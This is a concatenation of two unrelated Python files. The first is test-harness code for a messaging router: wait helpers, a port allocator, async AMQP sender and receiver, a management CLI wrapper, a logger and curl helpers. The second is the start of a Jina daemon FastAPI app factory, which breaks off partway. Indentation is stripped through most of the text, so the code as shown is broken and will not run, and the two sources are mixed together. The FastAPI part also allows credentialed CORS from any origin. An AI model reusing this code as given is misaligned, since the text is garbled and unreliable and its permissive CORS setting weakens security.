sys.stderr.write("\nRouter %s %s:\n>>>>\n" %
(self.config.router_id, description))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# failed to open file. This can happen when an individual test
# spawns a temporary router (i.e. not created as part of the
# TestCase setUpClass method) that gets cleaned up by the test.
pass
check_output_file(filename=self.outfile + '.out', description="output file")
check_output_file(filename=self.dumpfile, description="debug dump file")
if teardown_exc:
# teardown failed - possible router crash?
# dump extra stuff (command line, output, log)
def tail_file(fname, line_count=50):
"""Tail a file to a list"""
out = []
with open(fname) as f:
line = f.readline()
while line:
out.append(line)
if len(out) > line_count:
out.pop(0)
line = f.readline()
return out
try:
for fname in [("output", self.outfile + '.out'),
("command", self.outfile + '.cmd')]:
with open(fname[1]) as f:
sys.stderr.write("\nRouter %s %s file:\n>>>>\n" %
(self.config.router_id, fname[0]))
sys.stderr.write(f.read())
sys.stderr.write("\n<<<<\n")
if self.logfile:
sys.stderr.write("\nRouter %s log file tail:\n>>>>\n" %
self.config.router_id)
tail = tail_file(os.path.join(self.outdir, self.logfile))
for ln in tail:
sys.stderr.write("%s" % ln)
sys.stderr.write("\n<<<<\n")
sys.stderr.flush()
except OSError:
# ignore file not found in case test never opens these
pass
raise teardown_exc
@property
def ports_family(self):
"""
Return a dict of listener ports and the respective port family
Example -
        { 23456: 'IPv4', 24345: 'IPv6' }
"""
ports_fam = {}
for l in self.config.sections('listener'):
if l.get('socketAddressFamily'):
ports_fam[l['port']] = l['socketAddressFamily']
else:
ports_fam[l['port']] = 'IPv4'
return ports_fam
@property
def ports(self):
"""Return list of configured ports for all listeners"""
return [l['port'] for l in self.config.sections('listener')]
def _cfg_2_host_port(self, c):
host = c['host']
port = c['port']
socket_address_family = c.get('socketAddressFamily', 'IPv4')
if socket_address_family == 'IPv6':
return "[%s]:%s" % (host, port)
elif socket_address_family == 'IPv4':
return "%s:%s" % (host, port)
raise Exception("Unknown socket address family: %s" % socket_address_family)
@property
def http_addresses(self):
"""Return http://host:port addresses for all http listeners"""
cfg = self.config.sections('httpListener')
return ["http://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def addresses(self):
"""Return amqp://host:port addresses for all listeners"""
cfg = self.config.sections('listener')
return ["amqp://%s" % self._cfg_2_host_port(l) for l in cfg]
@property
def connector_addresses(self):
"""Return list of amqp://host:port for all connectors"""
cfg = self.config.sections('connector')
return ["amqp://%s" % self._cfg_2_host_port(c) for c in cfg]
@property
def hostports(self):
"""Return host:port for all listeners"""
return [self._cfg_2_host_port(l) for l in self.config.sections('listener')]
def is_connected(self, port, host='127.0.0.1'):
"""If router has a connection to host:port:identity return the management info.
Otherwise return None"""
try:
ret_val = False
response = self.management.query(type="io.skupper.router.connection")
index_host = response.attribute_names.index('host')
for result in response.results:
outs = '%s:%s' % (host, port)
if result[index_host] == outs:
ret_val = True
return ret_val
except:
return False
def wait_address(self, address, subscribers=0, remotes=0, count=1, **retry_kwargs):
"""
Wait for an address to be visible on the router.
@keyword subscribers: Wait till subscriberCount >= subscribers
@keyword remotes: Wait till remoteCount >= remotes
@keyword count: Wait until >= count matching addresses are found
@param retry_kwargs: keyword args for L{retry}
"""
def check():
# TODO aconway 2014-06-12: this should be a request by name, not a query.
# Need to rationalize addresses in management attributes.
# endswith check is because of M/L/R prefixes
addrs = self.management.query(
type='io.skupper.router.router.address',
attribute_names=['name', 'subscriberCount', 'remoteCount']).get_entities()
addrs = [a for a in addrs if a['name'].endswith(address)]
return (len(addrs) >= count
and addrs[0]['subscriberCount'] >= subscribers
and addrs[0]['remoteCount'] >= remotes)
assert retry(check, **retry_kwargs)
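    # Illustrative usage (the address is an example): block until at least one
    # local subscriber is attached to 'closest/foo' on this router.
    #
    #   router.wait_address('closest/foo', subscribers=1)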
def wait_address_unsubscribed(self, address, **retry_kwargs):
"""
Block until address has no subscribers
"""
a_type = 'io.skupper.router.router.address'
def check():
addrs = self.management.query(a_type).get_dicts()
rc = [a for a in addrs if a['name'].endswith(address)]
count = 0
for a in rc:
count += a['subscriberCount']
count += a['remoteCount']
return count == 0
assert retry(check, **retry_kwargs)
def get_host(self, socket_address_family):
if socket_address_family == 'IPv4':
return '127.0.0.1'
elif socket_address_family == 'IPv6':
return '::1'
else:
return '127.0.0.1'
def wait_ports(self, **retry_kwargs):
wait_ports(self.ports_family, **retry_kwargs)
def wait_connectors(self, **retry_kwargs):
"""
Wait for all connectors to be connected
@param retry_kwargs: keyword args for L{retry}
"""
for c in self.config.sections('connector'):
assert retry(lambda: self.is_connected(port=c['port'], host=self.get_host(c.get('socketAddressFamily'))),
**retry_kwargs), "Port not connected %s" % c['port']
def wait_startup_message(self, **retry_kwargs):
"""Wait for router startup message to be printed into logfile
This ensures that the router installs its signal handlers, avoiding
a router failure with return code -15 upon premature SIGTERM (DISPATCH-1689)
e.g. 2022-03-03 19:08:13.608655 +0100 SERVER (notice) Operational, 4 Threads Running (process ID 2190110)
"""
def _is_startup_line_present(f: TextIO) -> bool:
for line in f:
m = re.search(r'SERVER \(notice\) Operational, (\d+) Threads Running \(process ID (\d+)\)', line)
if m:
return True
return False
logfile_path = self.logfile_path
# system_tests_log_level_update filters SERVER module logs to a separate file
server_log = [l for l in self.config if (l[0] == 'log' and l[1]['module'] == 'SERVER')]
if server_log:
logfile_path = os.path.join(self.outdir, server_log[0][1].get('outputFile'))
assert retry(lambda: pathlib.Path(logfile_path).is_file(), **retry_kwargs), \
f"Router logfile {logfile_path} does not exist or is not a file"
with open(logfile_path, 'rt') as router_log:
assert retry(lambda: _is_startup_line_present(router_log), **retry_kwargs),\
"Router startup line not present in router log"
def wait_ready(self, **retry_kwargs):
"""Wait for ports and connectors to be ready"""
if not self._wait_ready:
self._wait_ready = True
self.wait_ports(**retry_kwargs)
self.wait_connectors(**retry_kwargs)
self.wait_startup_message(**retry_kwargs)
return self
def is_router_connected(self, router_id, **retry_kwargs):
node = None
try:
self.management.read(identity="router.node/%s" % router_id)
# TODO aconway 2015-01-29: The above check should be enough, we
# should not advertise a remote router in management till it is fully
# connected. However we still get a race where the router is not
# actually ready for traffic. Investigate.
# Meantime the following actually tests send-thru to the router.
node = Node.connect(self.addresses[0], router_id, timeout=1)
return retry_exception(lambda: node.query('io.skupper.router.router'))
except (proton.ConnectionException, NotFoundStatus, proton.utils.LinkDetached):
# proton.ConnectionException: the router is not yet accepting connections
# NotFoundStatus: the queried router is not yet connected
# TODO(DISPATCH-2119) proton.utils.LinkDetached: should be removed, currently needed for DISPATCH-2033
return False
finally:
if node:
node.close()
def wait_router_connected(self, router_id, **retry_kwargs):
retry(lambda: self.is_router_connected(router_id), **retry_kwargs)
@property
def logfile_path(self):
"""Path to a DEFAULT logfile"""
return os.path.join(self.outdir, self.logfile)
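# Illustrative sketch (not part of the original module): how a test might drive the
# wait helpers above once a Qdrouterd instance has been started. 'router' and the
# peer id 'ROUTER.B' are placeholder names; the keyword arguments to wait_address
# follow the docstring of that method above.
def _example_wait_for_router(router, peer_id='ROUTER.B'):
    """Hedged usage sketch for the Qdrouterd wait helpers."""
    router.wait_ready()                                      # ports, connectors, startup log line
    router.wait_router_connected(peer_id)                    # inter-router path is up
    router.wait_address('closest/example', subscribers=1)    # a local subscriber exists
    return router.addresses[0]                               # endpoint for management clients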
class Tester:
"""Tools for use by TestCase
- Create a directory for the test.
- Utilities to create processes and servers, manage ports etc.
- Clean up processes on teardown"""
# Top level directory above any Tester directories.
# CMake-generated configuration may be found here.
top_dir = os.getcwd()
# The root directory for Tester directories, under top_dir
root_dir = os.path.abspath(__name__ + '.dir')
# Minimum and maximum port number for free port searches
port_range = (20000, 30000)
def __init__(self, id):
"""
@param id: module.class.method or False if no directory should be created
"""
self.directory = os.path.join(self.root_dir, *id.split('.')) if id else None
self.cleanup_list = []
self.port_file = pathlib.Path(self.top_dir, "next_port.lock").open("a+t")
self.cleanup(self.port_file)
def rmtree(self):
"""Remove old test class results directory"""
if self.directory:
shutil.rmtree(os.path.dirname(self.directory), ignore_errors=True)
def setup(self):
"""Called from test setup and class setup."""
if self.directory:
os.makedirs(self.directory)
os.chdir(self.directory)
def _next_port(self) -> int:
"""Reads and increments value stored in self.port_file, under an exclusive file lock.
        When a lock cannot be acquired immediately, fcntl.flock blocks.
Failure possibilities:
        File locks may not work correctly on network filesystems. Even so, we should be no worse off than before.
This method always unlocks the lock file, so it should not ever deadlock other tests running in parallel.
Even if that happened, the lock is unlocked by the OS when the file is closed, which happens automatically
when the process that opened and locked it ends.
Invalid content in the self.port_file will break this method. Manual intervention is then required.
"""
try:
fcntl.flock(self.port_file, fcntl.LOCK_EX)
# read old value
self.port_file.seek(0, os.SEEK_END)
if self.port_file.tell() != 0:
self.port_file.seek(0)
port = int(self.port_file.read())
else:
# file is empty
port = random.randint(self.port_range[0], self.port_range[1])
next_port = port + 1
if next_port >= self.port_range[1]:
next_port = self.port_range[0]
# write new value
self.port_file.seek(0)
self.port_file.truncate(0)
self.port_file.write(str(next_port))
self.port_file.flush()
return port
finally:
fcntl.flock(self.port_file, fcntl.LOCK_UN)
def teardown(self):
"""Clean up (tear-down, stop or close) objects recorded via cleanup()"""
self.cleanup_list.reverse()
errors = []
for obj in self.cleanup_list:
try:
for method in ["teardown", "tearDown", "stop", "close"]:
cleanup = getattr(obj, method, None)
if cleanup:
cleanup()
break
except Exception as exc:
errors.append(exc)
if errors:
raise RuntimeError("Errors during teardown: \n\n%s" % "\n\n".join([str(e) for e in errors]))
def cleanup(self, x):
"""Record object x for clean-up during tear-down.
        x should have one of the methods teardown, tearDown, stop or close"""
self.cleanup_list.append(x)
return x
def popen(self, *args, **kwargs):
"""Start a Process that will be cleaned up on teardown"""
return self.cleanup(Process(*args, **kwargs))
def qdrouterd(self, *args, **kwargs):
"""Return a Qdrouterd that will be cleaned up on teardown"""
return self.cleanup(Qdrouterd(*args, **kwargs))
def http2server(self, *args, **kwargs):
return self.cleanup(Http2Server(*args, **kwargs))
def get_port(self, socket_address_family: str = 'IPv4') -> int:
"""Get an unused port"""
p = self._next_port()
start = p
while not is_port_available(p, socket_address_family):
p = self._next_port()
if p == start:
                raise Exception("No available ports in range %s" % (self.port_range,))
return p
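# Illustrative sketch (not part of the original module): typical use of the Tester
# helpers from a test. 'router_config' stands for a router configuration object
# built elsewhere in this file; the other names are placeholders.
def _example_tester(tester, router_config):
    """Hedged usage sketch: ports, routers and automatic cleanup."""
    port = tester.get_port()                       # unused port, e.g. for an extra listener
    router = tester.qdrouterd('A', router_config)  # stopped automatically on teardown
    receiver = tester.cleanup(AsyncTestReceiver(router.addresses[0], 'examples'))
    return port, router, receiver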
class TestCase(unittest.TestCase, Tester): # pylint: disable=too-many-public-methods
"""A TestCase that sets up its own working directory and is also a Tester."""
tester: Tester
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName)
Tester.__init__(self, self.id())
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.maxDiff = None
cls.tester = Tester('.'.join([cls.__module__, cls.__name__, 'setUpClass']))
cls.tester.rmtree()
cls.tester.setup()
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'tester'):
cls.tester.teardown()
del cls.tester
super().tearDownClass()
def setUp(self):
super().setUp()
Tester.setup(self)
def tearDown(self):
Tester.teardown(self)
super().tearDown()
def assert_fair(self, seq):
avg = sum(seq) / len(seq)
for i in seq:
assert i > avg / 2, "Work not fairly distributed: %s" % seq
if not hasattr(unittest.TestCase, 'assertRegex'):
def assertRegex(self, text, regexp, msg=None):
assert re.search(regexp, text), msg or "Can't find %r in '%s'" % (regexp, text)
if not hasattr(unittest.TestCase, 'assertNotRegex'):
def assertNotRegex(self, text, regexp, msg=None):
assert not re.search(regexp, text), msg or "Found %r in '%s'" % (regexp, text)
def main_module():
"""
Return the module name of the __main__ module - i.e. the filename with the
path and .py extension stripped. Useful to run the tests in the current file but
using the proper module prefix instead of '__main__', as follows:
if __name__ == '__main__':
unittest.main(module=main_module())
"""
return os.path.splitext(os.path.basename(__main__.__file__))[0]
class AsyncTestReceiver(MessagingHandler):
"""
A simple receiver that runs in the background and queues any received
messages. Messages can be retrieved from this thread via the queue member.
:param wait: block the constructor until the link has been fully
established.
:param recover_link: restart on remote link detach
"""
Empty = Queue.Empty
class MyQueue(Queue.Queue):
def __init__(self, receiver):
self._async_receiver = receiver
super(AsyncTestReceiver.MyQueue, self).__init__()
def get(self, timeout=TIMEOUT):
self._async_receiver.num_queue_gets += 1
msg = super(AsyncTestReceiver.MyQueue, self).get(timeout=timeout)
self._async_receiver._logger.log("message %d get"
% self._async_receiver.num_queue_gets)
return msg
def put(self, msg):
self._async_receiver.num_queue_puts += 1
super(AsyncTestReceiver.MyQueue, self).put(msg)
self._async_receiver._logger.log("message %d put"
% self._async_receiver.num_queue_puts)
def __init__(self, address, source, conn_args=None, container_id=None,
wait=True, recover_link=False, msg_args=None, print_to_console=False):
if msg_args is None:
msg_args = {}
super(AsyncTestReceiver, self).__init__(**msg_args)
self.address = address
self.source = source
self.conn_args = conn_args
self.queue = AsyncTestReceiver.MyQueue(self)
self._conn = None
self._container = Container(self)
cid = container_id or "ATR-%s:%s" % (source, uuid.uuid4())
self._container.container_id = cid
self._ready = Event()
self._recover_link = recover_link
self._recover_count = 0
self._stop_thread = False
self._thread = Thread(target=self._main)
self._logger = Logger(title="AsyncTestReceiver %s" % cid, print_to_console=print_to_console)
self._thread.daemon = True
self._thread.start()
self.num_queue_puts = 0
self.num_queue_gets = 0
if wait and self._ready.wait(timeout=TIMEOUT) is False:
raise Exception("Timed out waiting for receiver start")
self.queue_stats = "self.num_queue_puts=%d, self.num_queue_gets=%d"
def get_queue_stats(self):
return self.queue_stats % (self.num_queue_puts, self.num_queue_gets)
def _main(self):
self._container.timeout = 0.5
self._container.start()
self._logger.log("AsyncTestReceiver Starting reactor")
while self._container.process():
if self._stop_thread:
if self._conn:
self._conn.close()
self._conn = None
self._logger.log("AsyncTestReceiver reactor thread done")
def on_connection_error(self, event):
self._logger.log("AsyncTestReceiver on_connection_error=%s" % event.connection.remote_condition.description)
def on_link_error(self, event):
self._logger.log("AsyncTestReceiver on_link_error=%s" % event.link.remote_condition.description)
def stop(self, timeout=TIMEOUT):
self._stop_thread = True
self._container.wakeup()
self._thread.join(timeout=TIMEOUT)
self._logger.log("thread done")
if self._thread.is_alive():
raise Exception("AsyncTestReceiver did not exit")
del self._conn
del self._container
def on_start(self, event):
kwargs = {'url': self.address}
if self.conn_args:
kwargs.update(self.conn_args)
self._conn = event.container.connect(**kwargs)
def on_connection_opened(self, event):
self._logger.log("Connection opened")
kwargs = {'source': self.source}
event.container.create_receiver(event.connection, **kwargs)
def on_link_opened(self, event):
self._logger.log("link opened")
self._ready.set()
def on_link_closing(self, event):
self._logger.log("link closing")
event.link.close()
if self._recover_link and not self._stop_thread:
# lesson learned: the generated link name will be the same as the
# old link (which is bad) so we specify a new one
self._recover_count += 1
kwargs = {'source': self.source,
'name': "%s:%s" % (event.link.name, self._recover_count)}
rcv = event.container.create_receiver(event.connection,
**kwargs)
def on_message(self, event):
self.queue.put(event.message)
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
self._logger.log("Disconnected")
if self._conn:
self._conn.close()
self._conn = None
def dump_log(self):
self._logger.dump()
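# Illustrative sketch (not part of the original module): draining messages from an
# AsyncTestReceiver. The address and source below are placeholder values.
def _example_async_receiver(address='amqp://127.0.0.1:5672', source='examples'):
    """Hedged usage sketch: receive until the queue is empty, then stop."""
    rx = AsyncTestReceiver(address, source)            # blocks until the link is up
    received = []
    try:
        while True:
            received.append(rx.queue.get(timeout=1))   # MyQueue.get counts each read
    except AsyncTestReceiver.Empty:
        pass
    rx.stop()
    return received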
class AsyncTestSender(MessagingHandler):
"""
A simple sender that runs in the background and sends 'count' messages to a
given target.
"""
class TestSenderException(Exception):
def __init__(self, error=None):
super(AsyncTestSender.TestSenderException, self).__init__(error)
def __init__(self, address, target, count=1, message=None,
container_id=None, presettle=False, print_to_console=False):
super(AsyncTestSender, self).__init__(auto_accept=False,
auto_settle=False)
self.address = address
self.target = target
self.total = count
self.presettle = presettle
self.accepted = 0
self.released = 0
self.modified = 0
self.rejected = 0
self.sent = 0
self.error = None
self.link_stats = None
self._conn = None
self._sender = None
self._message = message or Message(body="test")
self._container = Container(self)
cid = container_id or "ATS-%s:%s" % (target, uuid.uuid4())
self._container.container_id = cid
self._link_name = "%s-%s" % (cid, "tx")
self._thread = Thread(target=self._main)
self._thread.daemon = True
self._logger = Logger(title="AsyncTestSender %s" % cid, print_to_console=print_to_console)
self._thread.start()
self.msg_stats = "self.sent=%d, self.accepted=%d, self.released=%d, self.modified=%d, self.rejected=%d"
def _main(self):
self._container.timeout = 0.5
self._container.start()
self._logger.log("AsyncTestSender Starting reactor")
while self._container.process():
self._check_if_done()
self._logger.log("AsyncTestSender reactor thread done")
def get_msg_stats(self):
return self.msg_stats % (self.sent, self.accepted, self.released, self.modified, self.rejected)
def wait(self):
# don't stop it - wait until everything is sent
self._logger.log("AsyncTestSender wait: about to join thread")
self._thread.join(timeout=TIMEOUT)
self._logger.log("AsyncTestSender wait: thread done")
assert not self._thread.is_alive(), "sender did not complete"
if self.error:
raise AsyncTestSender.TestSenderException(self.error)
del self._sender
del self._conn
del self._container
self._logger.log("AsyncTestSender wait: no errors in wait")
def on_start(self, event):
self._conn = self._container.connect(self.address)
def on_connection_opened(self, event):
self._logger.log("Connection opened")
option = AtMostOnce if self.presettle else AtLeastOnce
self._sender = self._container.create_sender(self._conn,
target=self.target,
options=option(),
name=self._link_name)
def on_sendable(self, event):
if self.sent < self.total:
self._sender.send(self._message)
self.sent += 1
self._logger.log("message %d sent" % self.sent)
def _check_if_done(self):
done = (self.sent == self.total
and (self.presettle
or (self.accepted + self.released + self.modified
+ self.rejected == self.sent)))
if done and self._conn:
self.link_stats = get_link_info(self._link_name,
self.address)
self._conn.close()
self._conn = None
self._logger.log("Connection closed")
def on_accepted(self, event):
self.accepted += 1
event.delivery.settle()
self._logger.log("message %d accepted" % self.accepted)
def on_released(self, event):
# for some reason Proton 'helpfully' calls on_released even though the
# delivery state is actually MODIFIED
if event.delivery.remote_state == Delivery.MODIFIED:
return self.on_modified(event)
self.released += 1
event.delivery.settle()
self._logger.log("message %d released" % self.released)
def on_modified(self, event):
self.modified += 1
event.delivery.settle()
self._logger.log("message %d modified" % self.modified)
def on_rejected(self, event):
self.rejected += 1
event.delivery.settle()
self._logger.log("message %d rejected" % self.rejected)
def on_link_error(self, event):
self.error = "link error:%s" % str(event.link.remote_condition)
self._logger.log(self.error)
if self._conn:
self._conn.close()
self._conn = None
def on_disconnected(self, event):
# if remote terminates the connection kill the thread else it will spin
# on the cpu
self.error = "connection to remote dropped"
self._logger.log(self.error)
if self._conn:
self._conn.close()
self._conn = None
def dump_log(self):
self._logger.dump()
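# Illustrative sketch (not part of the original module): sending a fixed number of
# messages and checking the delivery-outcome counters. Address/target are placeholders.
def _example_async_sender(address='amqp://127.0.0.1:5672', target='examples'):
    """Hedged usage sketch: send, wait for settlement, inspect the counters."""
    tx = AsyncTestSender(address, target, count=10, message=Message(body="hi"))
    tx.wait()        # raises TestSenderException if the link or connection failed
    assert tx.accepted + tx.released + tx.modified + tx.rejected == tx.sent
    return tx.get_msg_stats()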
class QdManager:
"""
A means to invoke skmanage during a testcase
"""
def __init__(self, address: Optional[str] = None,
timeout: Optional[float] = TIMEOUT,
router_id: Optional[str] = None,
edge_router_id: Optional[str] = None) -> None:
# 'tester' - can be 'self' when called in a test,
        # or an instance of any class derived from Process (like Qdrouterd)
self._timeout = timeout
self._address = address
self.router_id = router_id
self.edge_router_id = edge_router_id
self.router: List[str] = []
if self.router_id:
self.router = self.router + ['--router', self.router_id]
elif self.edge_router_id:
self.router = self.router + ['--edge-router', self.edge_router_id]
def __call__(self, cmd: str,
address: Optional[str] = None,
input: Optional[str] = None,
timeout: Optional[float] = None) -> str:
addr = address or self._address
assert addr, "address missing"
with subprocess.Popen(['skmanage'] + cmd.split(' ') + self.router
+ ['--bus', addr, '--indent=-1', '--timeout',
str(timeout or self._timeout)], stdin=PIPE,
stdout=PIPE, stderr=STDOUT,
universal_newlines=True) as p:
rc = p.communicate(input)
if p.returncode != 0:
raise Exception("%s %s" % rc)
return rc[0]
def create(self, long_type, kwargs):
cmd = "CREATE --type=%s" % long_type
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def update(self, long_type, kwargs, name=None, identity=None):
cmd = 'UPDATE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
for k, v in kwargs.items():
cmd += " %s=%s" % (k, v)
return json.loads(self(cmd))
def delete(self, long_type, name=None, identity=None):
cmd = 'DELETE --type=%s' % long_type
if identity is not None:
cmd += " --identity=%s" % identity
elif name is not None:
cmd += " --name=%s" % name
else:
assert False, "name or identity not supplied!"
self(cmd)
def query(self, long_type):
return json.loads(self('QUERY --type=%s' % long_type))
def get_log(self, limit=None):
cmd = 'GET-LOG'
        if limit:
cmd += " limit=%s" % limit
return json.loads(self(cmd))
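# Illustrative sketch (not part of the original module): invoking skmanage through
# QdManager. The address entity type is the one queried elsewhere in this file;
# the connector attributes are placeholder values.
def _example_qd_manager(address='127.0.0.1:5672'):
    """Hedged usage sketch for QdManager query/create/delete."""
    qm = QdManager(address=address)
    addresses = qm.query('io.skupper.router.router.address')
    qm.create('io.skupper.router.connector',
              {'name': 'extra', 'host': '127.0.0.1', 'port': 25672})
    qm.delete('io.skupper.router.connector', name='extra')
    return addresses, qm.get_log(limit=10)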
class MgmtMsgProxy:
"""
Utility for creating and inspecting management messages
"""
class _Response:
def __init__(self, status_code, status_description, body):
self.status_code = status_code
self.status_description = status_description
if body.__class__ == dict and len(body.keys()) == 2 and 'attributeNames' in body.keys() and 'results' in body.keys():
results = []
names = body['attributeNames']
for result in body['results']:
result_map = {}
for i in range(len(names)):
result_map[names[i]] = result[i]
results.append(MgmtMsgProxy._Response(status_code, status_description, result_map))
self.attrs = {'results': results}
else:
self.attrs = body
def __getattr__(self, key):
return self.attrs[key]
def __init__(self, reply_addr):
self.reply_addr = reply_addr
def response(self, msg):
ap = msg.properties
return self._Response(ap['statusCode'], ap['statusDescription'], msg.body)
def query_router(self):
ap = {'operation': 'QUERY', 'type': 'io.skupper.router.router'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_connections(self):
ap = {'operation': 'QUERY', 'type': 'io.skupper.router.connection'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_links(self):
ap = {'operation': 'QUERY', 'type': 'io.skupper.router.router.link'}
return Message(properties=ap, reply_to=self.reply_addr)
def query_addresses(self):
ap = {'operation': 'QUERY',
'type': 'io.skupper.router.router.address'}
return Message(properties=ap, reply_to=self.reply_addr)
def create_connector(self, name, **kwargs):
ap = {'operation': 'CREATE',
'type': 'io.skupper.router.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr,
body=kwargs)
def delete_connector(self, name):
ap = {'operation': 'DELETE',
'type': 'io.skupper.router.connector',
'name': name}
return Message(properties=ap, reply_to=self.reply_addr)
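# Illustrative sketch (not part of the original module): pairing the MgmtMsgProxy
# request builders with its response helper. 'reply_msg' stands for the AMQP message
# received on the reply address; it is not constructed here.
def _example_mgmt_proxy(reply_addr, reply_msg):
    """Hedged usage sketch: build a QUERY request and unpack its reply."""
    proxy = MgmtMsgProxy(reply_addr)
    request = proxy.query_addresses()            # Message to send to the management address
    rows = proxy.response(reply_msg).results     # per-row wrappers for a QUERY reply
    return request, rows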
class TestTimeout:
"""
A callback object for MessagingHandler class
parent: A MessagingHandler with a timeout() method
"""
__test__ = False
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.timeout()
class PollTimeout:
"""
A callback object for MessagingHandler scheduled timers
parent: A MessagingHandler with a poll_timeout() method
"""
def __init__(self, parent):
self.parent = parent
def on_timer_task(self, event):
self.parent.poll_timeout()
def get_link_info(name, address):
"""
Query the router at address for the status and statistics of the named link
"""
qdm = QdManager(address=address)
rc = qdm.query('io.skupper.router.router.link')
for item in rc:
if item.get('name') == name:
return item
return None
def has_mobile_dest_in_address_table(address, dest):
qdm = QdManager(address=address)
rc = qdm.query('io.skupper.router.router.address')
has_dest = False
for item in rc:
if dest in item.get("name"):
has_dest = True
break
return has_dest
def get_inter_router_links(address):
"""
    Return a list of all links with type="inter-router".
:param address:
"""
inter_router_links = []
qdm = QdManager(address=address)
rc = qdm.query('io.skupper.router.router.link')
for item in rc:
if item.get("linkType") == "inter-router":
inter_router_links.append(item)
return inter_router_links
class Timestamp:
"""
Time stamps for logging.
"""
def __init__(self):
self.ts = datetime.now()
def __str__(self):
return self.ts.strftime("%Y-%m-%d %H:%M:%S.%f")
class Logger:
"""
Record an event log for a self test.
May print per-event or save events to be printed later.
Pytest will automatically collect the logs and will dump them for a failed test
Optional file opened in 'append' mode to which each log line is written.
"""
def __init__(self,
title: str = "Logger",
print_to_console: bool = False,
save_for_dump: bool = True,
python_log_level: Optional[int] = logging.DEBUG,
ofilename: Optional[str] = None) -> None:
self.title = title
self.print_to_console = print_to_console
self.save_for_dump = save_for_dump
self.python_log_level = python_log_level
self.ofilename = ofilename
self.logs: List[Tuple[Timestamp, str]] = []
def log(self, msg):
ts = Timestamp()
if self.save_for_dump:
self.logs.append((ts, msg))
if self.print_to_console:
print("%s %s" % (ts, msg))
sys.stdout.flush()
if self.python_log_level is not None:
logging.log(self.python_log_level, f"{ts} {self.title}: {msg}")
if self.ofilename is not None:
with open(self.ofilename, 'a') as f_out:
f_out.write("%s %s\n" % (ts, msg))
f_out.flush()
def dump(self):
print(self)
sys.stdout.flush()
def __str__(self):
lines = [self.title]
for ts, msg in self.logs:
lines.append("%s %s" % (ts, msg))
res = str('\n'.join(lines))
return res
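# Illustrative sketch (not part of the original module): a Logger that keeps events
# in memory and also appends them to a file. The filename is a placeholder.
def _example_logger(ofile='example_receiver.log'):
    """Hedged usage sketch for Logger."""
    log = Logger(title="ExampleLogger", print_to_console=False, ofilename=ofile)
    log.log("starting")
    log.log("finished")
    log.dump()       # prints the buffered, timestamped lines
    return str(log)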
def curl_available():
"""
Check if the curl command line tool is present on the system.
Return a tuple containing the version if found, otherwise
    return False.
"""
popen_args = ['curl', '--version']
try:
process = Process(popen_args,
name='curl_check',
stdout=PIPE,
expect=None,
universal_newlines=True)
out = process.communicate()[0]
if process.returncode == 0:
# return curl version as a tuple (major, minor[,fix])
# expects --version outputs "curl X.Y.Z ..."
return tuple([int(x) for x in out.split()[1].split('.')])
    except Exception:
pass
return False
def run_curl(args, input=None, timeout=TIMEOUT):
"""
Run the curl command with the given argument list.
Pass optional input to curls stdin.
Return tuple of (return code, stdout, stderr)
"""
popen_args = ['curl'] + args
if timeout is not None:
popen_args = popen_args + ["--max-time", str(timeout)]
stdin_value = PIPE if input is not None else None
with subprocess.Popen(popen_args, stdin=stdin_value, stdout=PIPE,
stderr=PIPE, universal_newlines=True) as p:
out = p.communicate(input, timeout)
return p.returncode, out[0], out[1]
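# Illustrative sketch (not part of the original module): the skip-or-run pattern for
# the curl helpers above. The URL is a placeholder, not one used by real tests.
def _example_curl(url='http://127.0.0.1:8080/healthz'):
    """Hedged usage sketch: only shell out to curl when it is installed."""
    version = curl_available()
    if not version:
        return None      # curl missing; a real test would self.skipTest() here
    rc, out, err = run_curl(['-s', url], timeout=10)
    return rc, out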
|
__init__.py
|
import os
import pathlib
import subprocess
from pathlib import Path
from queue import Queue
from threading import Thread
from fastapi import FastAPI
from fastapi.middleware.cors import CORSMiddleware
from uvicorn import Config, Server
from jina import __version__, __resources_path__
from jina.logging.logger import JinaLogger
from .excepts import (
Runtime400Exception,
RequestValidationError,
PartialDaemon400Exception,
daemon_runtime_exception_handler,
partial_daemon_exception_handler,
validation_exception_handler,
)
from .parser import get_main_parser, _get_run_args
jinad_args = get_main_parser().parse_args([])
daemon_logger = JinaLogger('DAEMON', **vars(jinad_args))
__task_queue__ = Queue()
__root_workspace__ = jinad_args.workspace
__rootdir__ = str(Path(__file__).parent.parent.absolute())
__dockerfiles__ = str(Path(__file__).parent.absolute() / 'Dockerfiles')
def _get_app(mode=None):
from .api.endpoints import router
app = FastAPI(
title='JinaD (Daemon)',
description='REST interface for managing distributed Jina',
version=__version__,
openapi_tags=[
{
'name': 'daemon',
'description': 'API to manage the Daemon',
},
],
)
app.add_middleware(
CORSMiddleware,
allow_origins=['*'],
allow_credentials=True,
allow_methods=['*'],
allow_headers=['*'],
)
app.include_router(router)
app.add_exception_handler(RequestValidationError, validation_exception_handler)
if mode is None:
from .api.endpoints import flows, pods, peas, logs, workspaces
app.include_router(logs.router)
app.include_router(peas.router)
app.include_router(pods.router)
app.include_router(flows.router)
app.include_router(workspaces.router)
app.add_exception_handler(Runtime400Exception, daemon_runtime_exception_handler)
app.openapi_tags.extend(
[
{
'name': 'flows',
'description': 'API to manage Flows',
},
{
'name': 'pods',
'description': 'API to manage Pods',
},
{
'name': 'peas',
'description': 'API to manage Peas',
},
{
'name': 'logs',
'description': 'API to stream Logs',
},
{
'name': 'workspaces',
'description': 'API to manage Workspaces',
},
]
)
elif mode == 'pod':
from .api.endpoints.partial import pod
app.include_router(pod.router)
app.add_exception_handler(
PartialDaemon400Exception, partial_daemon_exception_handler
)
app.openapi_tags.append(
{
'name': 'pod',
'description': 'API to manage a Pod',
}
)
elif mode == 'pea':
from .api.endpoints.partial import pea
app.include_router(pea.router)
app.add_exception_handler(
PartialDaemon400Exception, partial_daemon_exception_handler
)
app.openapi_tags.append(
{
'name': 'pea',
'description': 'API to manage a Pea',
},
)
elif mode == 'flow':
from .api.endpoints.partial import flow
app.include_router(flow.router)
